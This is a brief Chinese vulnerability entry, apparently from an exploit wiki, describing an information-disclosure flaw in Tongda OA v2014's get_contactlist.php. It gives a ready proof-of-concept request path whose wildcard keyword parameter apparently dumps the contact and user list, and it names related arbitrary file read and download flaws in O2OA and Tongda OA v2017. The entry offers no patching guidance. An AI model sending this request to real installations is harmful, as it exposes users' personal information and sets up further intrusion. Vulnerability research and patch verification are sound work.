通达OA v2014 get_contactlist.php文件存在信息泄漏漏洞,攻击者通过漏洞可以获取敏感信息,进一步攻击
版本信息
验证POC
/mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3
O2OA open 后台任意文件读取漏洞 通达OA v2017 video_file.php 任意文件下载漏洞